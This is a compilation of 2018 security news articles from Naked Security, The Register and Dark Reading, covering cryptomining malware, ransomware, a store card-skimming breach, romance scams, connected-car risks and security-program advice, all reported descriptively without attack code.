STE WILLIAMS

Here’s Episode 2 of the Naked Security podcast.

We have two guests for you this week:

• We speak to Sophos security expert Matt Boddy about password guessing attacks – why do they still work in 2018, and what can we do about it?
• We interview top SophosLabs researcher Fraser Howard about HTTPS – is it really a security necessity that we should all embrace, or much ado about nothing?

If you enjoy the podcast, please share it with other people interested in security and privacy and give us a vote on iTunes and other podcasting directories.

Intro music: http://www.purple-planet.com

Closing music: https://thespacelords1.bandcamp.com

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/cDf-M8MrPNQ/

A sophisticated mystery hacker group is using tactics more familiar to the world of cyber espionage to earn millions through mining malware.

Kaspersky Lab researchers report that cybercrooks have begun using infection methods and techniques borrowed from targeted attacks in order to install mining software.

The most successful such group earned at least £5m by exploiting their victims in the the space of just six months last year, according to the security software firm’s estimates.

Miner vs miner: Attack script seeks out and destroys competing currency exploits

READ MORE

The group is using advanced persistent threat-style (APT) techniques and tools to infect users’ devices with miners. They have been using the process-hollowing method usually seen in malware and some targeted attacks of APT actors, but has never been observed in mining attacks before.

Prospective victims are lured into downloading and installing software containing a hidden miner. The installer drops a legitimate Windows utility at the same time it covertly installs crypto-mining malware.

After execution, a legitimate system process starts but the code of this process quickly turns malicious. As a result, the miner operates under the guise of a legitimate task, making it far less likely that victims will realise that anything is amiss. Even security software packages might be thrown off the scent by this tactic, according to researchers.

Infection chain of sophisticated mining malware

Process hollowing example [both graphics from Kaspersky Lab blog post]

If the user tries to stop the process, the computer system reboots. This combination of tactics make it more likely that mining malware will stay on infected systems longer, increasing the money-making potential for crooks.

The hacking group behind these tactics has been mining Electroneum coins and earned almost £5m during the second half of 2017, comparable to the sums that ransomware creators used to earn.

Rise up, miners

From September 2017, Kaspersky Lab recorded a rise of miners that begins to eclipse ransomware as a cybercrime racket. Unlike ransomware, cryptojacking doesn’t destructively harm users’ kit and is able to stay undetected for a long time by silently using the PC’s CPU and GPU power.

The growing availability of miner builders, open miner pools and partner programs are making it easy for unskilled would-be crooks to get a slice of the action from the growing miner menace. The most popular miner tool used by threat actors is Nanopool, Kaspersky Lab reports.

“We see that ransomware is fading into the background, instead giving way to miners,” said Anton Ivanov, lead malware analyst at Kaspersky Lab. “This is confirmed by our statistics, which show a steady growth of miners throughout the year, as well as by the fact that cybercriminal groups are actively developing their methods and have already started to use more sophisticated techniques to spread mining software.

“We have already seen such an evolution – ransomware hackers were using the same tricks when they were on the rise.”

Overall, 2.7 million users were attacked by malicious miners in 2017, according to Kaspersky Lab data. This represents a year-on-year growth of 50 per cent compared to 2016, when 1.87 million attacks on users were logged by the firm.

Adware, cracked games and pirated software have all been used by cybercriminals to secretly infect PCs with crypto-mining malware. Web mining through a special code located in an infected web page is also growing in prevalence. The most widely used web miner was CoinHive, discovered on many popular websites. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/03/06/apt_cryptomining/

A variant of SamSam sends CDOT employees back to pen and paper with two attack waves in two weeks.

Getting hit by ransomware is expensive and embarrassing. Getting hit twice in a two-week period makes it much worse. That’s the situation in which the Colorado Department of Transportation (CDOT) finds itself after a second wave of SamSam ransomware hit while the department was still in the process of cleaning up from the first attack.

In the first attack, over 2,000 computers running Windows and McAfee security software were taken offline after their files were encrypted. Approximately 20% of those systems had been brought back into service when a variation of the original ransomware struck in a second wave of attacks. All affected computers were once again taken offline as employees of the department reverted to pen and paper to complete routine tasks.

In an interview with the Denver Post, Brandi Simmons, a spokeswoman for the state’s Office of Information Technology said, “The variant of SamSam ransomware just keeps changing. The tools we have in place didn’t work. It’s ahead of our tools.”

Dozens of staff members from Colorado’s Office of Information Technology, the Colorado National Guard, and the FBI are working to get the systems back online. There is no current timeline for having all systems restored to service.

Read more here and here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/second-ransomware-round-hits-colorado-dot/d/d-id/1331197?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The auto industry should seize the opportunity and get in front of this issue.

Very few objects are as personal to their owners as their cars. But today’s cars have grown beyond a form of self-expression and turned into our personal concierges, navigating the best routes, making our dinner reservations, and potentially reserving parking spots ahead of our arrival. But with all the advantages connected vehicles can bring to our lives, they can also potentially expose us to security risks.

Security risks for networked computers are nothing new, but connected cars present new challenges precisely because, although cars have long been largely computerized, they weren’t networked. Many parts of cars — like the accelerator pedal or the turn signal — are designed to feel mechanical despite being run by tiny microprocessors that are connected through a network within the vehicle. Even so, vehicle software security hasn’t really been a concern because cars have always been isolated and self-contained entities. Now that they connect to the Internet, they expose a new attack surface. How can we secure these connected vehicles that are now accessing our networks?

It’s too early to tell how vehicle connectivity may impact an enterprise and it may seem absurd to think about a car as an enterprise network endpoint, but some luxury vehicle brands already have office productivity tools in-dash. Using the car as a workstation will only increase in popularity as autonomous driving replaces manual driving. In addition to the in-dash email, cars are also providing Wi-Fi hotspots and interfaces like Apple iOS CarPlay and Google Android Auto, which make our cars look and act more like our phones, raising the same kinds of concerns that are present with mobile devices in personal life and for the enterprise.

Autonomous driving isn’t limited to making knowledge workers’ windshield time more productive. Logistics companies, for example, will benefit tremendously from autonomous vehicles, but imagine an attacker compromising and shutting down those vehicles: the results would be disastrous not only to the logistics company but to all of the businesses that rely on them as a vendor. The same could be true for any business that relies heavily on connected vehicles.

Cautionary Tales
There are already cautionary tales about networked vehicles from other industries. Airlines, for example, were surprised when a security researcher claimed to have used an in-flight entertainment system to access the flight-control computers and modify a plane’s behavior. This was possible because there was insufficient segmentation between the networks supporting the critical functions and the networks supporting ancillary services. While accounts differ about the nature and severity of the incident, it’s clear that ubiquitous and unrestricted connectivity creates unintended risk.

Of course, conducting such an attack requires the attacker to be on the plane. But that wouldn’t necessarily be the case if there was an Internet connection available. To improve vehicle security, we must segment out the subsystems, separating entertainment and concierge services from the systems responsible for vehicle operation. This will ensure that neither is a gateway to the others and they don’t interact or affect one another. As intravehicle networks evolve and mature, even more segmentation may become desirable, but minimally it is necessary for two segments: one for systems and communications critical to the function of the vehicle, and one for “everything else.”

The telecom industry — with its stringent requirements for uptime and wide variety of services — has done a relatively good job of designing networks that separate critical operations from noncritical ones, as well building in resilience and mechanisms that prevent network abuse. The automotive industry could borrow these segmented network security concepts for use in their own factories in which the cars are built, for example the mission-critical machines and the computers that operate them reside on one protected network, while systems supporting less important front-office functions, such as email and file servers, reside on separate networks.

It’s unclear whether the automotive industry acknowledges this as a problem. If one out of 20 million produced cars malfunctions, that is statistically insignificant and may not be enough to drive major change. Ideally, auto companies would take their own initiative, benefiting from models established by organizations like state Bar Associations or The American Medical Association which prescribe requirements and standards of behavior for their membership. They could even create an industry-specific standards framework as the payment card industry did with the PCI Data Security Standard.

Ultimately, auto companies should treat this as a product safety feature in much the way that they do with seatbelts, air bags, and all the mechanical components of their product; they must ensure that they have clearly defined preventative and remedial maintenance procedures for the useful lifespan of their products.

While we are still a way off from hackers redirecting vehicles, or entering an enterprise network through a connected car, the technology is evolving and the infrastructure is forming to make these concerns a reality in the coming years. By taking cues from other industries that have navigated these channels, the auto industry has an opportunity to get ahead of the demand for security that is sure to come with innovation.

Related Content:

• Cybersecurity Fact vs. Fiction
• Billions of Bluetooth Devices Vulnerable to Code Execution, MITM Attacks
• The Economics of Software Security: What Car Makers Can Teach Enterprises

 

Black Hat Asia returns to Singapore with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier solutions and service providers in the Business Hall. Click for information on the conference and to register.

James Plouffe is a Lead Architect with MobileIron and a Technical Consultant for the hit series Mr. Robot. In his role as a member of the MobileIron Product and Ecosystem team, he is responsible for driving integrations with new technology partners, enhancing existing … View Full Bio

Article source: https://www.darkreading.com/endpoint/connected-cars-pose-new-security-challenges/a/d-id/1331166?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Games developer Nippon Ichi Software (NIS) has admitted that customers of two of its US online stores are at risk of credit card fraud after they were hacked.

Like something out of our What you sound like after a data breach article, it’s offering customers a $5 (£3.60) online voucher with no promise of credit checking beyond what the US Government already offers for free.

In social media posts and an email sent on 1 March, NIS said that the breach affecting nisamerica and snkonlinestore happened on 23 January and continued until it was discovered on 26 February.

During that period:

Your personal information, including your payment information, may have been compromised.

Which, when you read further into the alert email, turns out to be an understatement.

After entering their billing, shipping, and payment information, the customer would be temporarily redirected to an offsite web page not owned or operated by NIS America, Inc.

This “malicious process” grabbed everything entered by customers, including billing and shipping address, and credit card data (including the CVV number), before returning customers to the NIS America page to complete the transaction none the wiser. Only PayPal customers were not affected.

NIS said it has taken steps to close the vulnerability that led to the breach, which leaves us guessing as to exactly what that vulnerability might have been.

On Twitter, security researcher Kevin Beaumont claimed he’d been told that the weakness was a writable Amazon AWS S3 bucket, which hosted a JavaScript redirection to a third-party server.

NIS hasn’t confirmed this detail of the breach, so it remains informed but plausible speculation.

For now, the company’s biggest problem seems to be customer anger, not only at the severity of the breach but an offer to compensate victims by applying the $5 discount against future purchases. Said NIS:

We understand that this is a small token, but we hope it will show our commitment and appreciation of our customers as we begin to regain your trust.

After posting what was claimed to be a sequence of fraudulent card transactions running to $1,000, one Twitter user responded:

The five dollars will really help here.

NIS offered customers a link to the Federal Trade Commission’s identity theft service, which offers US citizens affected by data breaches a free 90-day fraud alert via one of several credit reference agencies.

A standard response in data breaches – especially ones that involve live credit card data – would be at least a year of credit checking and lock, as was the case for affected users after September’s massive Equifax breach.

This could be a test case for US regulators. NIS is no Equifax, but smaller breaches should not be ignored simply because they are smaller.

Follow @JohnEDunn
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wTvFA-AbS5s/

Ahhh, Iceland. Perched on the edge of the Arctic Circle, it’s got plentiful data center capacity, renewable energy galore from geothermal and hydroelectric power plants, and that reliably chilly climate to help with cooling.

No wonder cryptocurrency miners have been flooding into the island in recent months.

Of course, where miners go, thieves are sure to follow. Sure enough, Iceland now brings us yet another thievery method to add to the growing list of cryptocoin burglary techniques: this time “grabbing the actual servers”.

In what Icelandic media have dubbed the “Big Bitcoin Heist,” 600 servers have been spirited out of data centers in four burglaries. Three heists happened in December and a fourth took place in January. According to AP, authorities have kept it on the hush-hush while they’ve worked on tracking down the culprits.

Investigators haven’t found the servers yet. They’re worth nearly $2 million, AP reports. As The Register notes, it’s not surprising that the hardware has proved to be elusive: servers used to mine bitcoins are pretty generic. They could easily have been stripped for parts – be they the currently scarce GPUs, the RAM or the fast solid-state disks – and shipped piecemeal for sale anywhere.

Icelandic police haven’t come up completely empty-handed, however: they’ve arrested 11 people so far, including a security guard. A judge at the Reykjanes District Court on Friday ordered two people to remain in custody.

AP quoted Olafur Helgi Kjartansson, the police commissioner on the southwestern Reykjanes peninsula, where two of the raids took place:

This is a grand theft on a scale unseen before. Everything points to this being a highly organized crime.

Police are keeping an eye out for unusually spiked energy usage across the country that could lead them to the servers, according to an industry source who spoke with AP under condition of anonymity.

Icelandic authorities have called on local internet service providers (ISPs), electricians and storage space units to report any unusual requests for power.

Of course, if the servers have been carved up and shipped out, that could well turn out to be a dead end.

At any rate, back to the newly lengthened list of ways to rip off people in these frenzied days of seeking fast cryptocoin riches. Now, we can add hardware kidnapping to that list. It will appear alongside exit scams, mining malware, mining malware cum ransomware, kidnapping, your common-or-garden variety hacking, and IRL robbers with IRL guns.

It’s a dangerous place, this brave new world of cranking out virtual currency. Does it scare you off?

No shame in that. The ranks of a-pox-on-this-stuff investors are swelling right along with the ways to rip it off. Bill Gates last week threw his hat into the ring with other cryptocoin naysayers, saying that virtual currencies are killing people in a “fairly direct way” because of how they’re used to fund terrorism and to buy fentanyl and other dangerous drugs.

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/iBDg-wcg3PI/

Well, ooo-la-la, “Martin,” you silver-haired fox, I just love your dating profile photos. I’m so sorry for the recent loss of your dog – what a cutie! But I’m super touched by the one where you’re doing something or other with pastries and jam, for a charity – awwww!

You’re just the man for me – you hot, sensitive, caring thing. You’re mature, plus that photo of you in the swimming pool in Mykonos shows you’ve stayed in shape since your wife died, and… wait one minute!

What’s that you say? You’re happily married? …And gay??!!

Oh, dear. *Poof!* go my dreams and those of at least three women who saw “Martin’s” photos on dating sites and social media platforms… actually, let’s make that 58-year-old Danish-American widower “Martin” on the Zoosk dating site, divorced Danish-American “Christian” on EliteSingles, and 50-year-old divorcé “Sebastian” on Facebook.

It turns out that the photos are actually of Steve Bustin, 46, currently happily married to his husband. They live in Brighton in the UK. Scammers have been using his photos to woo women since 2016.

Over the weekend, Bustin got so sick of being contacted by confused women that he decided to devalue the photos by telling The Times that he’s never visited a dating site and that he’s not going to be making some heterosexual woman’s dreams come true, given his aforementioned husband.

These are some of the captions the scammers slapped on the ripped-off photos:

The dog was mine but he passed last year.

The one with my face painted was Halloween.

The one with the pastries and jam was to raise funds for charity.

The one with me and just the woman is my late wife.

Lies, lies, despicable lies. Bustin told the Times that the romance scammers had used his likenesses to “construct a profile of my whole life”:

Someone has been harvesting images of me from all over the web.

The photos go back as far as 2012, to the photo of Bustin in a pool while he was on holiday in Mykonos, Greece. The most recent photo is from a Halloween party in autumn 2017.

A scammer going under the name Martin Peterson was using those photos, trying to pull the wool over the eyes of a 60-year-old widow. She allowed The Times to print her photo but not her name.

She told the publication that the scammer first contacted her on 29 January. He/she was using photos stolen from a social media site. The woman grew suspicious a few days later, when “Martin” claimed to be on holiday in Dubai and sent her photos supposedly of him having breakfast, then in the swimming pool. Funny thing, she noticed: his hair went from salt and pepper to silver, and the photos made it look like he’d gotten chubbier.

What followed was more song and dance: a purported passport photo, a video of Bustin on a Skype call (with the scammer’s voice superimposed) for a “live” conversation, an invitation to move into his home in north London barely two weeks after their initial phone conversation.

It was that invitation that led the woman to do a bit of forensics – she did a reverse image search. That’s what led her to Bustin: a former BBC News producer who now works as a speaker and as a speech and media trainer. The Times quoted her:

I thought I’d found my Prince Charming. I was really taken in. He used to seem so kind. He’d send me music and say: ‘Do you like the song? Do you like dancing?’ I feel a total idiot.

For Bustin, it was an “Oh no, here we go again” situation. In July 2016, Birgit Hebibi, 54, who lives in Berlin, had contacted Bustin to let him know that she too had been snookered by a scammer using his identity. Hebibi told The Sunday Times that she’d been contacted by “Sebastian,” who claimed to be British and working in Thailand. Smart cookie: she broke it off when he started asking her for money.

Then, a year ago, he heard from a woman who went by the name Isobel on dating sites. She told Bustin that “Christian Hansen” had wooed her on EliteSingles, again hiding behind his photos. She took it up with the site, which apologized, admitting:

It does appear that this individual was able to slip under the radar.

Bustin said he’s been increasing the privacy settings on his social media posts, but hey, he’s a public figure: he’s got to put himself out there with an active public profile.

How to vet Prince Charming

Nobody should be embarrassed by falling for one of these scammers. They know what we want to hear, and they know how to sound sincere – to the point that they can convince their targets to ignore the warnings of family and friends who smell a rat. Like, say, the 79-year-old accountant who fell for a Nigerian email scammer so hard that he bilked a friend out of £151,000 ($184,000) to come to the rescue of a “girlfriend” he’d never actually met. Even at trial, he still staunchly believed all the romantic bilge “she” pumped out.

We’ve got to keep in mind that embarrassment and financial fraud aren’t the only things that can happen to us if we fall for these come-ons. In October 2016, the accountant was found guilty of fraud by misrepresentation – for deceiving his bilked friend by lying about his “relationship” with the scammer – and was sentenced to 18 months in jail.

Then there was the woman who got dragged into an Argentinian prison for 2.5 years, for unwittingly attempting to smuggle cocaine sewn into the lining of a suitcase at her “lover’s” request.

The FBI has a term for these liar-bags: sweetheart swindlers. These are the warning signs the FBI says we should keep an eye out for to spot somebody who’s trying to con us, our family or our friends:

• Presses you to leave the dating website you met through and to communicate using personal email or instant messaging.
• Professes instant feelings of love.
• Claims to be local but is purportedly traveling or working overseas.
• Makes plans to visit you but is then unable to do so because of a tragic event.
• Asks for money for a variety of reasons (travel, medical emergencies, hotel bills, hospital bills for child or other relative, etc).

If you, or the intended victim, still isn’t convinced, a powerful tool is the one used by the 60-year-old widow to find out who “Martin” really was: run a reverse image lookup search to see where else Prince Charming or Princess Distressed and Broke Maiden has been hanging out online.

It’s free, and it’s instructive: you could well find the photo a fake friend has used, perhaps even posted on sites devoted to exposing the fraudsters who use the same images over and over – typically, stolen images.

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/mb6uExAnDR8/

Cryptocurrency-mining malware-scum have started to write code that evicts rivals from compromised computers.

The miner in question was first noticed by SANS Internet Storm Center handler Xavier Mertens. Mertens spotted the PowerShell script on March 4, and noting that it kills any other CPU-greedy processes it spots on target machines, he wrote: “The fight for CPU cycles started!”

Pre-infection, the attack script checks whether a target machine is 32-bit or 64-bit and downloads files known to VirusTotal as hpdriver.exe or hpw64 (they’re pretending to be HP drivers of some kind).

If successfully installed, the attack then lists running processes and kills any it doesn’t like. Mertens noted that alongside ordinary Windows stuff, the list of death-marked processes includes many associated with cryptominers, some of which are listed below.

Silence
Carbon
xmrig32
nscpucnminer64
cpuminer
xmr86
xmrig
xmr

Mertens wrote that the script also checks for processes associated with security tools.

Marten’s next post is also worth a look if you’re a Linux admin. He followed up on this Tweet from ESET’s Michal Malik.

https://t.co/KjDgSgGz94 infects Linux servers

1) adds public key to authorized_keys

2) runs a coinminer

3) generates IP ranges, uses masscan

3a) to pwn Windows hosts with EternalBlue, then its payload downloads a PE file

3b) to pwn Linux hosts via Redis downloads itself on pic.twitter.com/IvWzU1jBqy

— Michal Malík (@michalmalik) March 2, 2018

It’s a bash script that tries to push a miner onto Linux boxes, along with scanning the Internet for Windows machines vulnerable to the NSA’s EternalBlue attack. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/03/06/cryptocurrency_miner_sans_martens/

An inquiry into The Co-operative Bank’s financial collapse is to open four years after it was first announced by former UK chancellor George Osborne.

The Treasury today directed financial regulator Prudential Regulation Authority (PRA) to conduct a review into how the bank was regulated between 2008 and 2013, before a £1.5bn capital hole emerged in its books as a result of bad loans.

Separately, Britain’s Financial Conduct Authority (FCA) has also today banned the bank’s disgraced former chairman, Paul “Crystal Methodist” Flowers, from ever holding another financial services position.

The inquiry will look at the impact of IT on its operations, specifically whether the regulator was made aware by Co-op Bank of the change in the accounting treatment of the cost of replacing its IT platform in 2010. And if it was, whether it should “have acted to postpone the effect of the IT programme on the Co-op Bank’s capital position”.

Following its collapse in 2013, part of the turnaround efforts for Co-op included throwing £500m at overhauling its creaking IT infrastructure after years of “under-investment”.

In 2015 the FCA and PRA said they were closely supervising the firm as it worked towards restoring its technology compliance.

The FCA informed Co-op that its technology issues constitute a breach of its Threshold Conditions, which include an outline of the minimum standards for technology. That issue centred around its lack of a proven end-to-end disaster recovery capability.

Nicky Morgan, chair of the Treasury Select Committee, wrote to FCE chief exec Andrew Bailey last week asking for a “full explanation” for the delay.

In a statement, she said: “The launch of the independent inquiry into Co-op Bank – more than four years after it was announced – is welcome; but it is hugely overdue.

“Although much has changed since the events in question, a forensic examination of the circumstances of Co-op Bank’s failure will no doubt yield important lessons for the financial regulators.”

Mark Zelmer, previously a senior official at the Bank of Canada and the International Monetary Fund (IMF), will lead the investigation. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/03/06/delayed_probe_into_failure_of_coop_bank_finally_launched/

Ocean-boiling is responsible for most of the draconian, nonproductive security policies I’ve witnessed over the course of my career. Here’s why they don’t work.

I’ve always been a fan of the rather descriptive expression “boil the ocean.” According to Investopedia, boiling the ocean is to undertake an impossible task or project, or to make a task or project unnecessarily difficult. More concisely, boiling the ocean generally means “to go overboard.”

In security, we can learn a valuable lesson from this expression. Security is all about balance and pragmatism. Enumerating risks and threats to the organization while simultaneously prioritizing them. Seeking to mitigate risk while in parallel understanding the need to accept a certain amount of it. Building a security program even though some of the people, process, and technology involved may be missing or imperfect. Running security operations with an understanding that the conditions are never ideal. Balancing between business or operational needs and security principles. And so on…

In my experience, boiling the ocean does not allow an organization to improve its security posture. In fact, quite the opposite is true. So how can organizations turn away from ocean-boiling and toward a more pragmatic approach to security?  I present “20 signs you are trying to boil the ocean.”

1. Perfect is the enemy of good. I’m a big fan of the Pareto principle. Sometimes it is possible to roll out a solution that addresses most of what we need fairly quickly, even if it doesn’t address everything. If we wait for that perfect solution, we might be waiting a long time.
2. Finding the problem in every solution. I’ve worked with some pretty impressive people over the course of my career who seem able to find a solution to nearly every problem they face. I’ve also worked with people who seem to find the problem in every solution they discover. The former helps organizations mature. The latter makes them spin their wheels endlessly.
3. Working in series rather than in parallel. Ever feel like you can’t move forward on tasks B, C, and D until task A is completed? That may be the case in some instances. But in many cases, there isn’t as much interdependence between tasks as you think. It is very often quite possible to work in parallel to move things forward.
4. Inability to find the path forward. If trying to move any effort forward seems like an endless series of dead ends, it could be a sign that a less complicated path may bring better results.
5. Paralysis. Organizational paralysis can be, well, paralyzing. If employees don’t try and effect change because they feel that it is doomed to failure, it could be another sign of rampant ocean boiling.
6. Playing hot potato. When the answer is unknown, it’s easy to just say no and pass the hot potato on to the next person. Putting aside ocean boiling allows organizations to identify what can be done, instead of what cannot be done.
7. Always looking for more data points. It’s easy to put off a decision because you are waiting for more data points. At some point, you need to realize that you have just about all of the relevant data points you will ever have and make a decision.
8. Always waiting for something else to happen. In a similar manner, it’s easy to put off a decision because you are waiting for something else to be completed.  Sometimes there is a genuine need for this time of dependence, but often, it’s another symptom of ocean boiling.
9. Looking for every out. Ever come across people who seem like they are just looking for every possible out or opportunity to dismiss an idea? No idea is perfect, but many ideas can develop into real-life solutions.
10. Waiting for more money. There will never be enough budget to do everything that needs doing. Prioritize and get moving.
11. Waiting for more time. See number 10.
12. Looking for the perfect hire. Everyone wants to hire a 20-year-old analyst with 10 years of experience. I’d also like to have a pet unicorn, but we can’t always have what we want. Consider hiring bright, energetic, motivated, and analytical people and training them.
13. Drowning in false positives. Well, if I turn off my noisiest alerts, then I might miss something, so I’ll just do nothing instead. Sound familiar? News flash: if you are drowning in false positives, you are missing something already. Figure out how to be alerted to more of the stuff you care about and less of the stuff you don’t.
14. Stagnant on content development. Attacker techniques continually evolve. You will never arrive at the perfect signature, logic, or algorithm. Know when you have something good enough that gives you a good shot at identifying attacker activity without drowning you in false positives.
15. Processes and procedures are forever a work in progress. There will always be more that can be documented or documented better. But at some point, your team needs guidance and a path forward for a variety of different situations.
16. Inability to start a dialogue with executives. You will never be prepared enough for all the potential questions and points that executives might raise. But you need to be able to get enough of a story together to be able to discuss risk prioritization with executives and move your team’s agenda forward.
17. Inability to make progress with the business. Security shouldn’t be the team of no, nor should it inhibit the business. On the other hand, risk to the business needs to managed properly and minimized wherever possible. These may sound like contradictory points, but a pragmatic, collaborative approach to the business can make all parties converge to a workable solution.
18. Operations permanently stuck in ramp-up. I’ve seen lots of situations where security teams seem to ramp up for years on end. At some point, security operations must start, even if imperfect. A security program can always be improved iteratively once it is running day-to-day. That’s much better than never getting anything off of the ground.
19. Inability to prioritize risk. Every risk seems like a top priority. But if we have limited resources, we have to make calculated choices. Otherwise, we spin our wheels forever.
20. Draconian policies. Ocean boiling is responsible for most of the draconian security policies I’ve seen over the course of my career. It helps to understand which policies and practices actually contribute to improving security, and which ones just make ocean boilers feel better.

Related Content:

• 7 Ways to Maximize Your Security Dollars
• 20 Signs You Need to Introduce Automation into Security Ops
• In Security Life, Busy Is Not a Badge of Honor

 

Black Hat Asia returns to Singapore with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier solutions and service providers in the Business Hall. Click for information on the conference and to register.

Josh (Twitter: @ananalytical) is an experienced information security leader with broad experience building and running Security Operations Centers (SOCs). Josh is currently co-founder and chief product officer at IDRRA and also serves as security advisor to ExtraHop. Prior to … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/pragmatic-security-20-signs-you-are-boiling-the-ocean/a/d-id/1331178?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple